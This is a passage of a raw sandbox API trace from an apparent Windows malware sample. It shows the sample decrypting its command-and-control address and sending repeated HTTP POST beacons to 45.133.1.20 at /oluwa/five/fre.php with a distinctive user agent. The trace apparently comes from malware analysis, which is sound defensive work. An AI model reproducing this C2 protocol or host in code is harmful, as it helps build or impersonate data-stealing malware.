Flags=0x0, Size=0x7d) returned 0x6beca0 [0299.986] GetProcessHeap () returned 0x6a0000 [0299.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0299.987] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.987] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.987] GetProcessHeap () returned 0x6a0000 [0299.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da7c8 [0299.988] GetProcessHeap () returned 0x6a0000 [0299.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.988] GetProcessHeap () returned 0x6a0000 [0299.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0299.988] GetProcessHeap () returned 0x6a0000 [0299.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0299.989] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.990] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.990] GetProcessHeap () returned 0x6a0000 [0299.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0299.990] GetProcessHeap () returned 0x6a0000 [0299.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.991] send (s=0xb50, buf=0x6bd460*, len=242, flags=0) returned 242 [0299.992] send (s=0xb50, buf=0x6bb998*, len=159, flags=0) returned 159 [0299.992] GetProcessHeap () returned 0x6a0000 [0299.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0299.992] recv (in: s=0xb50, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0300.059] GetProcessHeap () returned 0x6a0000 [0300.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0300.060] GetProcessHeap () returned 0x6a0000 [0300.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0300.061] GetProcessHeap () returned 0x6a0000 [0300.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da7c8 | out: hHeap=0x6a0000) returned 1 [0300.061] GetProcessHeap () returned 0x6a0000 [0300.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0300.062] closesocket (s=0xb50) returned 0 [0300.062] GetProcessHeap () returned 0x6a0000 [0300.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0300.062] GetProcessHeap () returned 0x6a0000 [0300.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.063] GetProcessHeap () returned 0x6a0000 [0300.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0300.063] GetProcessHeap () returned 0x6a0000 [0300.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0300.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1880) returned 0xb50 [0300.067] Sleep (dwMilliseconds=0xea60) [0300.068] GetProcessHeap () returned 0x6a0000 [0300.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0300.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.070] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0300.089] GetProcessHeap () returned 0x6a0000 [0300.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0300.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.091] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0300.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.092] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.093] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.093] GetProcessHeap () returned 0x6a0000 [0300.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0300.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.095] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0300.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.096] CryptDestroyKey (hKey=0x6ad020) returned 1 [0300.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.097] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0300.097] GetProcessHeap () returned 0x6a0000 [0300.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.121] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.123] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.124] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.124] GetProcessHeap () returned 0x6a0000 [0300.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0300.130] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0300.130] GetProcessHeap () returned 0x6a0000 [0300.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0300.131] GetProcessHeap () returned 0x6a0000 [0300.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.131] GetProcessHeap () returned 0x6a0000 [0300.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0300.131] GetProcessHeap () returned 0x6a0000 [0300.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0300.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0300.154] GetProcessHeap () returned 0x6a0000 [0300.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0300.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.157] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.158] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.159] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.159] GetProcessHeap () returned 0x6a0000 [0300.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0300.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.161] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0300.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.162] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.162] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0300.163] GetProcessHeap () returned 0x6a0000 [0300.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.163] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0300.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.164] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0300.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.165] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0300.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.166] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0300.166] GetProcessHeap () returned 0x6a0000 [0300.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0300.166] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0300.166] GetProcessHeap () returned 0x6a0000 [0300.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0300.166] socket (af=2, type=1, protocol=6) returned 0xb54 [0300.167] connect (s=0xb54, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0300.284] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0300.284] GetProcessHeap () returned 0x6a0000 [0300.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0300.284] GetProcessHeap () returned 0x6a0000 [0300.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0300.285] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.286] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0300.286] GetProcessHeap () returned 0x6a0000 [0300.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da648 [0300.286] GetProcessHeap () returned 0x6a0000 [0300.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.287] GetProcessHeap () returned 0x6a0000 [0300.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0300.287] GetProcessHeap () returned 0x6a0000 [0300.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0300.290] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.290] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0300.291] GetProcessHeap () returned 0x6a0000 [0300.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0300.291] GetProcessHeap () returned 0x6a0000 [0300.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.291] send (s=0xb54, buf=0x6bd460*, len=242, flags=0) returned 242 [0300.292] send (s=0xb54, buf=0x6bb998*, len=159, flags=0) returned 159 [0300.292] GetProcessHeap () returned 0x6a0000 [0300.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0300.292] recv (in: s=0xb54, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0300.357] GetProcessHeap () returned 0x6a0000 [0300.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0300.358] GetProcessHeap () returned 0x6a0000 [0300.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0300.359] GetProcessHeap () returned 0x6a0000 [0300.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da648 | out: hHeap=0x6a0000) returned 1 [0300.359] GetProcessHeap () returned 0x6a0000 [0300.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0300.360] closesocket (s=0xb54) returned 0 [0300.360] GetProcessHeap () returned 0x6a0000 [0300.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0300.360] GetProcessHeap () returned 0x6a0000 [0300.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.361] GetProcessHeap () returned 0x6a0000 [0300.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0300.361] GetProcessHeap () returned 0x6a0000 [0300.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0300.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1888) returned 0xb54 [0300.364] Sleep (dwMilliseconds=0xea60) [0300.367] GetProcessHeap () returned 0x6a0000 [0300.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0300.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0300.391] GetProcessHeap () returned 0x6a0000 [0300.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0300.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.392] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0300.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.393] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.396] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.396] GetProcessHeap () returned 0x6a0000 [0300.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0300.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.404] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0300.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.406] CryptDestroyKey (hKey=0x6ad020) returned 1 [0300.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.409] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0300.409] GetProcessHeap () returned 0x6a0000 [0300.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.412] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.413] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.413] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.414] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.414] GetProcessHeap () returned 0x6a0000 [0300.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0300.414] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0300.415] GetProcessHeap () returned 0x6a0000 [0300.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0300.415] GetProcessHeap () returned 0x6a0000 [0300.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.415] GetProcessHeap () returned 0x6a0000 [0300.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0300.416] GetProcessHeap () returned 0x6a0000 [0300.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0300.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0300.431] GetProcessHeap () returned 0x6a0000 [0300.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0300.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.435] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.436] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.437] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.437] GetProcessHeap () returned 0x6a0000 [0300.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0300.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.439] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0300.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.439] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.441] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0300.441] GetProcessHeap () returned 0x6a0000 [0300.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.442] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0300.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.446] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0300.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.448] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0300.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.453] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0300.453] GetProcessHeap () returned 0x6a0000 [0300.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0300.455] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0300.455] GetProcessHeap () returned 0x6a0000 [0300.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0300.456] socket (af=2, type=1, protocol=6) returned 0xb58 [0300.456] connect (s=0xb58, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0300.525] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0300.525] GetProcessHeap () returned 0x6a0000 [0300.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0300.525] GetProcessHeap () returned 0x6a0000 [0300.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0300.526] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.527] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0300.527] GetProcessHeap () returned 0x6a0000 [0300.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da648 [0300.527] GetProcessHeap () returned 0x6a0000 [0300.527] HeapFree (in: 